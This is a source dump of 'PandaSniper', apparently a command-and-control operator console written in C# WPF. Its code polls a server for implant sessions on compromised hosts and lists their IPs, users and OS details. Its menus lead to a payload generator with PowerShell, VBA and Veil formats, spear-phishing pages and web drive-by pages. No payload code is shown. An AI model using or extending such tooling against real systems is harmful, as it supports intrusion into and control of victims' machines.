| { 193 | 194 | } 195 | 196 | private void ListenerHelp_MouseLeave(object sender, MouseEventArgs e) 197 | { 198 | 199 | } 200 | 201 | private void ListenerHelp_Click(object sender, RoutedEventArgs e) 202 | { 203 | 204 | } 205 | 206 | //攻击模块事件 207 | 208 | private TreeViewItem TreeViewItemIsSelected(TreeViewItem treeViewItem) 209 | { 210 | if (treeViewItem.IsSelected) 211 | { 212 | return treeViewItem; 213 | } 214 | if (treeViewItem.HasItems == true) 215 | { 216 | foreach (TreeViewItem Item_X in treeViewItem.Items) 217 | { 218 | if (TreeViewItemIsSelected(Item_X).IsSelected) 219 | { 220 | return Item_X; 221 | } 222 | } 223 | } 224 | return treeViewItem; 225 | } 226 | 227 | private void TI_Attacks_PreviewMouseUp(object sender, MouseButtonEventArgs e) 228 | { 229 | bool IsSelected_count = false; 230 | foreach(TreeViewItem Item in Attack_TreeView.Items) 231 | { 232 | if(TreeViewItemIsSelected(Item).IsSelected) 233 | { 234 | IsSelected_count = true; 235 | } 236 | } 237 | if(IsSelected_count == false) 238 | { 239 | TVI_Packages.IsSelected = true; 240 | } 241 | } 242 | 243 | private void TVI_Packages_PreviewMouseUp(object sender, MouseButtonEventArgs e) 244 | { 245 | if(TVI_Packages.IsSelected) 246 | { 247 | if(TVI_Packages.IsExpanded == false) 248 | { 249 | TVI_Packages.IsExpanded = true; 250 | } 251 | else 252 | { 253 | TVI_Packages.IsExpanded = false; 254 | } 255 | } 256 | AttacksChangePage.Content = new Frame() 257 | { 258 | Content = this.Attacks_Packages 259 | }; 260 | } 261 | 262 | private void TVI_PayloadGeneragor_PreviewMouseUp(object sender, MouseButtonEventArgs e) 263 | { 264 | AttacksChangePage.Content = new Frame() 265 | { 266 | Content = this.Attacks_PayloadGeneragor 267 | }; 268 | } 269 | 270 | private void TVI_LinuxExecutable_PreviewMouseUp(object sender, MouseButtonEventArgs e) 271 | { 272 | AttacksChangePage.Content = new Frame() 273 | { 274 | Content = this.Attacks_LinuxExecutable 275 | }; 276 | } 277 | 278 | private void 
TVI_LinuxExecutableS_PreviewMouseUp(object sender, MouseButtonEventArgs e) 279 | { 280 | AttacksChangePage.Content = new Frame() 281 | { 282 | Content = this.Attacks_LinuxExecutableS 283 | }; 284 | } 285 | 286 | private void TVI_WebDriveBy_PreviewMouseUp(object sender, MouseButtonEventArgs e) 287 | { 288 | AttacksChangePage.Content = new Frame() 289 | { 290 | Content = this.Attacks_WebDriveBy 291 | }; 292 | } 293 | 294 | private void TVI_SpearPhish_PreviewMouseUp(object sender, MouseButtonEventArgs e) 295 | { 296 | AttacksChangePage.Content = new Frame() 297 | { 298 | Content = this.Attacks_SpearPhish 299 | }; 300 | } 301 | } 302 | } 303 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainSetting.xaml: -------------------------------------------------------------------------------- 1 |  11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainSetting.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// MainSetting.xaml 的交互逻辑 20 | /// 21 | public partial class MainSetting : Page 22 | { 23 | public MainSetting() 24 | { 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainWindow.xaml: -------------------------------------------------------------------------------- 1 |  24 | 25 | 26 | 27 | 28 | 29 | 30 | 33 
| 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 58 | 59 | 60 | 77 | 78 | 79 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 129 | 130 | 131 | 145 | 146 | 147 | 148 | 149 | 150 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainWindow.xaml.cs: -------------------------------------------------------------------------------- 1 | using Newtonsoft.Json; 2 | using Newtonsoft.Json.Linq; 3 | using System; 4 | using System.Collections; 5 | using System.Collections.Generic; 6 | using System.Collections.ObjectModel; 7 | using System.ComponentModel; 8 | using System.Diagnostics.CodeAnalysis; 9 | using System.Linq; 10 | using System.Net.Security; 11 | using System.Text; 12 | using System.Threading; 13 | using System.Threading.Tasks; 14 | using System.Windows; 15 | using System.Windows.Controls; 16 | using System.Windows.Data; 17 | using System.Windows.Documents; 18 | using System.Windows.Input; 19 | using System.Windows.Media; 20 | using System.Windows.Media.Imaging; 21 | using System.Windows.Navigation; 22 | using System.Windows.Shapes; 23 | using System.Windows.Threading; 24 | 25 | namespace PandaSniper 26 | { 27 | /// 28 | /// MainWindow.xaml 的交互逻辑 29 | /// 30 | public partial class MainWindow : Window 31 | { 32 | public MainPage Mainpage; 33 | public MainPayload Payloadpage; 34 | public MainSetting Settingpage; 35 | 36 | public UserProfile userProfile; 37 | 38 | public ObservableCollection listeners = new ObservableCollection() { }; 39 | 40 | //public List targetListViews = new List(); 41 | 42 | public MainWindow() 43 | { 44 | InitializeComponent(); 45 | } 46 | 47 | public class GetImplantResultClass 48 | { 49 | public UserProfile userProfile; 50 | public AsyncObservableCollection targetListViews; 51 | public EventsContent eventsContent; 52 | //public ListView BodySessionListView; 53 | 54 | 
/// <summary>
/// Thread body that repeatedly sends a type "1" request over the session's connection
/// and mirrors the returned entries into <c>targetListViews</c>.
/// </summary>
/// <remarks>
/// The loop condition <c>isGo</c> is never set to false in this method, and the
/// Thread.Sleep call is commented out, so requests are issued back to back until the
/// thread ends or an exception escapes. Replies whose "code" is not "200" are ignored.
/// NOTE(review): fields of the reply are dereferenced without null checks; a reply
/// missing an expected field would presumably throw on this thread.
/// </remarks>
public void GetImplantResult()
{
    // Request: type "1", the session token, no data.
    DataFormat MessageData;
    MessageData.type = "1";
    MessageData.token = userProfile.token;
    MessageData.data = null;
    string sendMessage = JsonConvert.SerializeObject(MessageData);
    bool isGo = true;
    // Marked as a background thread so it does not keep the process alive.
    Thread.CurrentThread.IsBackground = true;
    // Reuses the connection stored on the user profile rather than opening a new one.
    SslTcpClient sslTcpClient = userProfile.sslTcpClient;
    do
    {
        SslStream sslStream = sslTcpClient.SendMessage(sendMessage);
        sslTcpClient.ReadMessage(sslStream);
        JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage);
        if (rMJson["code"].ToString() == "200")
        {
            foreach (var item in rMJson["result"])
            {
                // Time since the entry's "time" value, rendered as "[d ][h ][m ]s".
                // Function.GetDateTime is defined elsewhere; presumably it parses the server timestamp.
                TimeSpan ts = DateTime.Now - Function.GetDateTime(item["time"].ToString());
                string invalTs = ts.Seconds.ToString() + "s";

                // NOTE(review): the checks are nested, so hours are only shown when the
                // minutes component is non-zero, and days only when hours is non-zero
                // (e.g. an age of exactly 1h 0m 5s is rendered as "5s").
                if (ts.Minutes != 0)
                {
                    invalTs = ts.Minutes.ToString() + "m " + invalTs;
                    if (ts.Hours != 0)
                    {
                        invalTs = ts.Hours.ToString() + "h " + invalTs;
                        if (ts.Days != 0)
                        {
                            invalTs = ts.Days.ToString() + "d " + invalTs;
                        }
                    }
                }

                // Row built from the reply; all values are taken from the server as-is.
                TargetListView tLV = new TargetListView(
                    item["country"].ToString(),
                    item["ip"].ToString(),
                    item["innerip"].ToString(),
                    item["pid"].ToString(),
                    item["user"].ToString(),
                    item["osinfo"].ToString(),
                    item["cpuinfo"].ToString(),
                    invalTs
                    )
                {
                    uid = item["uid"].ToString(),
                    time = item["time"].ToString()
                };
                //Console.WriteLine(Function.GetDateTime(item["time"].ToString()).ToString());
                // isE becomes true when a row with the same uid is already in the collection.
                bool isE = false;
                foreach(TargetListView tlv in targetListViews)
                {
                    if(tlv.uid == tLV.uid)
                    {
                        // Only changed fields are written back to the existing row.
                        if (tlv.Country != tLV.Country)
                        {
                            targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Country = tLV.Country;
                        }

                        if (tlv.ExternalIP != tLV.ExternalIP)
                        {
                            targetListViews.ElementAt(targetListViews.IndexOf(tlv)).ExternalIP = tLV.ExternalIP;
                        }
                        if (tlv.InternalIP != tLV.InternalIP)
                        {
                            targetListViews.ElementAt(targetListViews.IndexOf(tlv)).InternalIP = tLV.InternalIP;
                        }
                        if (tlv.Pid != tLV.Pid)
                        {
                            targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Pid = tLV.Pid;
                        }
                        if (tlv.User != tLV.User)
                        {
                            targetListViews.ElementAt(targetListViews.IndexOf(tlv)).User = tLV.User;
                        }
                        if (tlv.Computer != tLV.Computer)
                        {
                            targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Computer = tLV.Computer;
                        }
                        if (tlv.Arch != tLV.Arch)
                        {
                            targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Arch = tLV.Arch;
                        }
                        // The "last seen" text is refreshed on every pass (the guard is commented out).
                        //if (tlv.time != tLV.time)
                        //{
                        targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Last = tLV.Last;
                        //}
                        isE = true;
                    }
                }
                // Unknown uid: add the row and append an "Online" line to the events text.
                if(isE == false || targetListViews.Count == 0)
                {
                    targetListViews.Add(tLV);
                    string events = "[" + tLV.Country + "] " + Function.GetDateTime(tLV.time).ToString() + " " + tLV.InternalIP + "(" + tLV.computer.Trim() + ") Online";
                    if(eventsContent.Content == "")
                    {
                        eventsContent.Content = events + "\n";
                    }
                    else
                    {
                        eventsContent.Content = eventsContent.Content + events + "\n";
                    }
                    //this.BodySessionListView.Dispatcher.Invoke(new Action(() => { this.BodySessionListView.Items.Clear(); this.BodySessionListView.ItemsSource = this.targetListViews; }));
                }
            }
            //Thread.Sleep(1000);
        }
    } while (isGo);

}
} // closes GetImplantResultClass

/// <summary>
/// Creates the three pages, loads the listener list from the server (type "6" request)
/// and starts the background thread that runs GetImplantResult.
/// </summary>
/// <remarks>
/// NOTE(review): the background thread is given the same userProfile, and therefore the
/// same SslTcpClient, that this method uses for its own request; no locking is visible
/// here - confirm nothing else uses that connection once the thread is running.
/// (Generic type arguments, e.g. on AsyncObservableCollection, are missing in this listing.)
/// </remarks>
private void Window_Loaded(object sender, RoutedEventArgs e)
{
    this.Mainpage = new MainPage();
    this.Payloadpage = new MainPayload();
    this.Settingpage = new MainSetting();

    // Hand the session and the shared listener collection to the pages.
    this.Mainpage.userProfile = this.userProfile;
    this.Payloadpage.userProfile = this.userProfile;
    this.Payloadpage.listeners = this.listeners;

    ChangePage.Content = new Frame()
    {
        Content = this.Mainpage
    };
    // Check whether listeners exist on the server and fetch them.

    DataFormat MessageData;
    MessageData.type = "6";
    MessageData.token = userProfile.token;
    MessageData.data = null;
    string sendMessage = JsonConvert.SerializeObject(MessageData);
    userProfile.sslTcpClient.ReadMessage(userProfile.sslTcpClient.SendMessage(sendMessage));
    JObject rMJson = (JObject)JsonConvert.DeserializeObject(userProfile.sslTcpClient.resultMessage);
    if (rMJson["code"].ToString() == "200")
    {
        foreach (var item in rMJson["result"])
        {
            // Only entries whose "status" is true are listed; the row gets a random
            // 6-character first argument and the port, every other column is left empty.
            if ((bool)item["status"])
            {
                ListenersListView LLV = new ListenersListView(
                    Function.GenerateRandomString(6),
                    "",
                    "",
                    "",
                    item["port"].ToString(),
                    "",
                    "",
                    "",
                    ""
                    )
                {
                };
                this.listeners.Add(LLV);
            }

            //Console.WriteLine(Function.GetDateTime(item["time"].ToString()).ToString());
        }
        //Thread.Sleep(1000);
    }
    else if(rMJson["code"].ToString() == "500")
    {
        MessageBox.Show(rMJson["error"].ToString());
    }
    else if (rMJson["code"].ToString() == "401")
    {
        MessageBox.Show(rMJson["error"].ToString());
    }

    // Fetch the session list: bind the collection and the events text to the main page.
    AsyncObservableCollection targetListViews = new AsyncObservableCollection();
    this.Mainpage.BodySessionListView.ItemsSource = targetListViews;

    EventsContent eventsContent = new EventsContent() { };
    this.Mainpage.EventsTextBox.DataContext = eventsContent;

    GetImplantResultClass myThread = new GetImplantResultClass
    {
        userProfile = this.userProfile,
        targetListViews = targetListViews,
        eventsContent = eventsContent
        //BodySessionListView = this.Mainpage.BodySessionListView
    };


    // The thread is not stored anywhere; GetImplantResult marks it as a background thread itself.
    Thread thread = new Thread(myThread.GetImplantResult);
    thread.Start();



    //Console.WriteLine(this.userProfile.sslTcpClient.resultMessage);
}
/// <summary>Asks both hosted pages to recompute their list column widths.</summary>
private void AutoSizeWindow()
{
    this.Mainpage.AutoSizeWindow();
    this.Payloadpage.AutoSizeWindow();
}

/// <summary>Drags the window while the left mouse button is held on the title bar.</summary>
private void WindowTitle_MouseMove(object sender, MouseEventArgs e)
{
    if (e.LeftButton != MouseButtonState.Pressed)
    {
        return;
    }
    this.DragMove();
}

// Click counter for title-bar double-click detection; reset by the 300 ms timer below.
int i = 0;

/// <summary>
/// Counts title-bar clicks; the second click that arrives before the 300 ms timer
/// resets the counter toggles between the normal and the maximised layout.
/// </summary>
private void WindowTitle_MouseDown(object sender, MouseButtonEventArgs e)
{
    i++;
    var resetTimer = new System.Windows.Threading.DispatcherTimer();
    resetTimer.Interval = new TimeSpan(0, 0, 0, 0, 300);
    resetTimer.Tick += (tickSender, tickArgs) =>
    {
        resetTimer.IsEnabled = false;
        i = 0;
    };
    resetTimer.IsEnabled = true;

    if (i % 2 != 0)
    {
        return;
    }
    resetTimer.IsEnabled = false;
    i = 0;
    ToggleMaximizedState();
}

// Switches to the normal layout when the window fills the work area, otherwise maximises it.
private void ToggleMaximizedState()
{
    if (IsWindowMaxSize())
    {
        ToWindowNormal();
        return;
    }
    ToWindowMaxSize();
}

// Applies one visibility value to the close, minimise and maximise icons, in that order.
private void SetTitleBarIconVisibility(Visibility state)
{
    this.WindowCloseIcon.Visibility = state;
    this.WindowMinSizeIcon.Visibility = state;
    this.WindowMaxSizeIcon.Visibility = state;
}

/// <summary>Shows the three title-bar icons while the pointer is over the close button.</summary>
private void WindowClose_MouseEnter(object sender, MouseEventArgs e)
{
    SetTitleBarIconVisibility(Visibility.Visible);
}

/// <summary>Hides the three title-bar icons when the pointer leaves the close button.</summary>
private void WindowClose_MouseLeave(object sender, MouseEventArgs e)
{
    SetTitleBarIconVisibility(Visibility.Hidden);
}

/// <summary>Shows the three title-bar icons while the pointer is over the minimise button.</summary>
private void WindowMinSize_MouseEnter(object sender, MouseEventArgs e)
{
    SetTitleBarIconVisibility(Visibility.Visible);
}

/// <summary>Hides the three title-bar icons when the pointer leaves the minimise button.</summary>
private void WindowMinSize_MouseLeave(object sender, MouseEventArgs e)
{
    SetTitleBarIconVisibility(Visibility.Hidden);
}

/// <summary>Shows the three title-bar icons while the pointer is over the maximise button.</summary>
private void WindowMaxSize_MouseEnter(object sender, MouseEventArgs e)
{
    SetTitleBarIconVisibility(Visibility.Visible);
}

/// <summary>Hides the three title-bar icons when the pointer leaves the maximise button.</summary>
private void WindowMaxSize_MouseLeave(object sender, MouseEventArgs e)
{
    SetTitleBarIconVisibility(Visibility.Hidden);
}

/// <summary>Closes the main window.</summary>
private void WindowClose_Click(object sender, RoutedEventArgs e)
{
    this.Close();
}

/// <summary>Minimises the main window.</summary>
private void WindowMinSize_Click(object sender, RoutedEventArgs e)
{
    this.WindowState = WindowState.Minimized;
}

/// <summary>Toggles between the normal and the maximised layout.</summary>
private void WindowMaxSize_Click(object sender, RoutedEventArgs e)
{
    ToggleMaximizedState();
}

/// <summary>Restores the 1080 x 720 layout, centred in the work area, and resizes the page columns.</summary>
private void ToWindowNormal()
{
    const double normalHeight = 720;
    const double normalWidth = 1080;

    this.Height = normalHeight;
    this.Width = normalWidth;
    this.Left = (SystemParameters.WorkArea.Width - normalWidth) / 2;
    this.Top = (SystemParameters.WorkArea.Height - normalHeight) / 2;
    this.AutoSizeWindow();
}

/// <summary>Moves the window to the origin, stretches it over the work area and resizes the page columns.</summary>
private void ToWindowMaxSize()
{
    this.Left = 0;
    this.Top = 0;
    this.Height = SystemParameters.WorkArea.Height;
    this.Width = SystemParameters.WorkArea.Width;
    this.AutoSizeWindow();
}

/// <summary>Reports whether the window currently has exactly the size of the work area.</summary>
private Boolean IsWindowMaxSize()
{
    return this.Height == SystemParameters.WorkArea.Height
        && this.Width == SystemParameters.WorkArea.Width;
}

// Menu bar event handlers.

// Brush used for a menu icon while the pointer is over its entry; a new brush per call.
private static SolidColorBrush CreateMenuHoverBrush()
{
    return new SolidColorBrush(Colors.White);
}

// Brush used for a menu icon once the pointer has left its entry; a new brush per call.
private static SolidColorBrush CreateMenuIdleBrush()
{
    Color idle = (Color)ColorConverter.ConvertFromString("#FF686868");
    return new SolidColorBrush(idle);
}

// Wraps the given page in a fresh Frame and makes it the visible content.
private void ShowPageInFrame(Page page)
{
    Frame host = new Frame();
    host.Content = page;
    ChangePage.Content = host;
}

/// <summary>Highlights the main-page menu icon.</summary>
private void MenuMainPage_MouseEnter(object sender, RoutedEventArgs e)
{
    this.MenuMainPageIcon.Foreground = CreateMenuHoverBrush();
}

/// <summary>Returns the main-page menu icon to its idle colour.</summary>
private void MenuMainPage_MouseLeave(object sender, RoutedEventArgs e)
{
    this.MenuMainPageIcon.Foreground = CreateMenuIdleBrush();
}

/// <summary>Shows the main page, creating it first if it does not exist yet.</summary>
private void MenuMainPage_Click(object sender, RoutedEventArgs e)
{
    this.Mainpage = this.Mainpage ?? new MainPage();
    ShowPageInFrame(this.Mainpage);
}

/// <summary>Highlights the payload-page menu icon.</summary>
private void MenuMainPayload_MouseEnter(object sender, RoutedEventArgs e)
{
    this.MenuMainPayloadIcon.Foreground = CreateMenuHoverBrush();
}

/// <summary>Returns the payload-page menu icon to its idle colour.</summary>
private void MenuMainPayload_MouseLeave(object sender, RoutedEventArgs e)
{
    this.MenuMainPayloadIcon.Foreground = CreateMenuIdleBrush();
}

/// <summary>Shows the payload page, creating it first if it does not exist yet.</summary>
private void MenuMainPayload_Click(object sender, RoutedEventArgs e)
{
    this.Payloadpage = this.Payloadpage ?? new MainPayload();
    ShowPageInFrame(this.Payloadpage);
}

/// <summary>Highlights the settings-page menu icon.</summary>
private void MenuMainSetting_MouseEnter(object sender, RoutedEventArgs e)
{
    this.MenuMainSettingIcon.Foreground = CreateMenuHoverBrush();
}

/// <summary>Returns the settings-page menu icon to its idle colour.</summary>
private void MenuMainSetting_MouseLeave(object sender, RoutedEventArgs e)
{
    this.MenuMainSettingIcon.Foreground = CreateMenuIdleBrush();
}

/// <summary>Shows the settings page, creating it first if it does not exist yet.</summary>
private void MenuMainSetting_Click(object sender, RoutedEventArgs e)
{
    this.Settingpage = this.Settingpage ?? new MainSetting();
    ShowPageInFrame(this.Settingpage);
}
} // closes class MainWindow
} // closes namespace PandaSniper
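--------------------------------------------------------------------------------
/Master/PandaSniper/Md5.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;

namespace PandaSniper
{
    /// <summary>
    /// Helper that renders the MD5 digest of a string as lowercase hexadecimal.
    /// </summary>
    class Md5
    {
        /// <summary>
        /// Returns the MD5 digest of the UTF-8 bytes of <paramref name="str"/> as 32 lowercase
        /// hexadecimal characters.
        /// </summary>
        /// <remarks>
        /// Despite the method name this is a one-way hash, not encryption: the input cannot be
        /// recovered with a key, and the output hides nothing about short or guessable inputs.
        /// MD5 is unsalted, fast and not collision resistant, so if the result is used as a
        /// password verifier or an integrity check it is not adequate; a salted key-derivation
        /// function (for example Rfc2898DeriveBytes) or SHA-256 respectively is the usual
        /// replacement. The name is kept so existing callers keep compiling.
        /// </remarks>
        /// <param name="str">Text to hash; a null value raises ArgumentNullException.</param>
        /// <returns>The digest as a 32-character lowercase hex string.</returns>
        public static string EncryptString(string str)
        {
            // Convert the string to a byte array.
            byte[] input = Encoding.UTF8.GetBytes(str);

            byte[] digest;
            // MD5 implements IDisposable; release the provider as soon as the hash is computed.
            using (MD5 md5 = MD5.Create())
            {
                digest = md5.ComputeHash(input);
            }

            // Render each byte as two lowercase hex digits.
            StringBuilder hex = new StringBuilder(digest.Length * 2);
            foreach (byte b in digest)
            {
                hex.Append(b.ToString("x2"));
            }
            return hex.ToString();
        }
    }
}

-------------------------------------------------------------------------------- /Master/PandaSniper/Packages.xaml: -------------------------------------------------------------------------------- 1 |  11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 29 | 30 | Packages 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /Master/PandaSniper/Packages.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// Packages.xaml 的交互逻辑 20 | /// 21 | public partial class Packages : Page 22 | { 23 | public Packages() 24 | 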
{ 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/PandaSniper.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | Debug 7 | AnyCPU 8 | {6EEAC8E1-443F-4934-91C3-0B806FA3DC0D} 9 | WinExe 10 | PandaSniper 11 | PandaSniper 12 | v4.6 13 | 512 14 | {60dc8134-eba5-43b8-bcc9-bb4bc16c2548};{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC} 15 | 4 16 | true 17 | true 18 | 19 | 20 | false 21 | publish\ 22 | true 23 | Disk 24 | false 25 | Foreground 26 | 7 27 | Days 28 | false 29 | false 30 | true 31 | 0 32 | 1.0.0.%2a 33 | false 34 | true 35 | 36 | 37 | AnyCPU 38 | true 39 | full 40 | false 41 | bin\Debug\ 42 | DEBUG;TRACE 43 | prompt 44 | 4 45 | 46 | 47 | AnyCPU 48 | pdbonly 49 | true 50 | bin\Release\ 51 | TRACE 52 | prompt 53 | 4 54 | 55 | 56 | l.ico 57 | 58 | 59 | 60 | 61 | 62 | 63 | ..\packages\MaterialDesignColors.1.2.1\lib\net45\MaterialDesignColors.dll 64 | 65 | 66 | ..\packages\MaterialDesignThemes.3.0.0\lib\net45\MaterialDesignThemes.Wpf.dll 67 | 68 | 69 | ..\packages\Newtonsoft.Json.12.0.3\lib\net45\Newtonsoft.Json.dll 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 4.0 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | MSBuild:Compile 90 | Designer 91 | 92 | 93 | AddListener.xaml 94 | 95 | 96 | 97 | 98 | 99 | LinuxExecutableS.xaml 100 | 101 | 102 | 103 | LoginWindow.xaml 104 | 105 | 106 | 107 | SpearPhish.xaml 108 | 109 | 110 | 111 | 112 | WebDriveBy.xaml 113 | 114 | 115 | Designer 116 | MSBuild:Compile 117 | 118 | 119 | Designer 120 | MSBuild:Compile 121 | 122 | 123 | Designer 124 | MSBuild:Compile 125 | 126 | 127 | Designer 128 | MSBuild:Compile 129 | 130 | 131 | Designer 132 | MSBuild:Compile 133 | 134 | 135 | Designer 136 | MSBuild:Compile 137 | 138 | 139 | Designer 140 | MSBuild:Compile 141 | 142 | 143 | MSBuild:Compile 144 | Designer 145 | 146 | 147 | App.xaml 148 | Code 149 | 150 | 151 | 
LinuxExecutable.xaml 152 | 153 | 154 | MainPage.xaml 155 | 156 | 157 | MainPayload.xaml 158 | 159 | 160 | MainSetting.xaml 161 | 162 | 163 | MainWindow.xaml 164 | Code 165 | 166 | 167 | Designer 168 | MSBuild:Compile 169 | 170 | 171 | Designer 172 | MSBuild:Compile 173 | 174 | 175 | Designer 176 | MSBuild:Compile 177 | 178 | 179 | Designer 180 | MSBuild:Compile 181 | 182 | 183 | 184 | 185 | Packages.xaml 186 | 187 | 188 | PayloadGeneragor.xaml 189 | 190 | 191 | Code 192 | 193 | 194 | True 195 | True 196 | Resources.resx 197 | 198 | 199 | True 200 | Settings.settings 201 | True 202 | 203 | 204 | ResXFileCodeGenerator 205 | Resources.Designer.cs 206 | 207 | 208 | 209 | SettingsSingleFileGenerator 210 | Settings.Designer.cs 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | False 219 | Microsoft .NET Framework 4.6 %28x86 和 x64%29 220 | true 221 | 222 | 223 | False 224 | .NET Framework 3.5 SP1 225 | false 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 这台计算机上缺少此项目引用的 NuGet 程序包。使用“NuGet 程序包还原”可下载这些程序包。有关更多信息,请参见 http://go.microsoft.com/fwlink/?LinkID=322105。缺少的文件是 {0}。 239 | 240 | 241 | 242 | 243 | -------------------------------------------------------------------------------- /Master/PandaSniper/PandaSniper.csproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | zh-CN 11 | false 12 | 13 | -------------------------------------------------------------------------------- /Master/PandaSniper/PayloadGeneragor.xaml: -------------------------------------------------------------------------------- 1 |  11 | 12 | 33 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 90 | 94 | 95 | 96 | 97 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 112 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 158 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 253 | 254 
| PayloadGeneragor 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 274 | This panel generates a payload to stage a Panda Sniper listener. Several output options are available. 275 | 276 | 277 | 278 | 279 | 280 | 281 | 282 | 283 | 286 | 287 | 290 | 291 | 292 | 293 | 296 | 297 | 300 | 301 | 304 | 305 | 306 | 313 | 314 | HTTPS-443 315 | 316 | 317 | HTTP-80 318 | 319 | 320 | DNS-53 321 | 322 | 323 | TCP-8888 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 334 | 337 | 338 | 341 | 342 | 343 | 344 | 347 | 348 | 351 | 352 | 353 | 360 | 361 | C 362 | 363 | 364 | C# 365 | 366 | 367 | COM Scriptlet 368 | 369 | 370 | Java 371 | 372 | 373 | PowerShell 374 | 375 | 376 | PowerShell Command 377 | 378 | 379 | Python 380 | 381 | 382 | Raw 383 | 384 | 385 | Ruby 386 | 387 | 388 | Veil 389 | 390 | 391 | VBA 392 | 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400 | 401 | 404 | 405 | 408 | 409 | 410 | 411 | 412 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 440 | 441 | 442 | 443 | 444 | 445 | 446 | -------------------------------------------------------------------------------- /Master/PandaSniper/PayloadGeneragor.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// PayloadGeneragor.xaml 的交互逻辑 20 | /// 21 | public partial class PayloadGeneragor : Page 22 | { 23 | public PayloadGeneragor() 24 | { 25 | InitializeComponent(); 26 | } 27 | 28 | private void PayloadGeneragorAdd_MouseEnter(object sender, MouseEventArgs e) 29 | { 30 | 31 | } 32 
| 33 | private void PayloadGeneragorAdd_MouseLeave(object sender, MouseEventArgs e) 34 | { 35 | 36 | } 37 | 38 | private void PayloadGeneragorAdd_Click(object sender, RoutedEventArgs e) 39 | { 40 | 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /Master/PandaSniper/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Resources; 3 | using System.Runtime.CompilerServices; 4 | using System.Runtime.InteropServices; 5 | using System.Windows; 6 | 7 | // 有关程序集的一般信息由以下 8 | // 控制。更改这些特性值可修改 9 | // 与程序集关联的信息。 10 | [assembly: AssemblyTitle("PandaSniper")] 11 | [assembly: AssemblyDescription("")] 12 | [assembly: AssemblyConfiguration("")] 13 | [assembly: AssemblyCompany("")] 14 | [assembly: AssemblyProduct("PandaSniper")] 15 | [assembly: AssemblyCopyright("Copyright © 2019")] 16 | [assembly: AssemblyTrademark("")] 17 | [assembly: AssemblyCulture("")] 18 | 19 | // 将 ComVisible 设置为 false 会使此程序集中的类型 20 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 21 | //请将此类型的 ComVisible 特性设置为 true。 22 | [assembly: ComVisible(false)] 23 | 24 | //若要开始生成可本地化的应用程序,请设置 25 | //.csproj 文件中的 CultureYouAreCodingWith 26 | //例如,如果您在源文件中使用的是美国英语, 27 | //使用的是美国英语,请将 设置为 en-US。 然后取消 28 | //对以下 NeutralResourceLanguage 特性的注释。 更新 29 | //以下行中的“en-US”以匹配项目文件中的 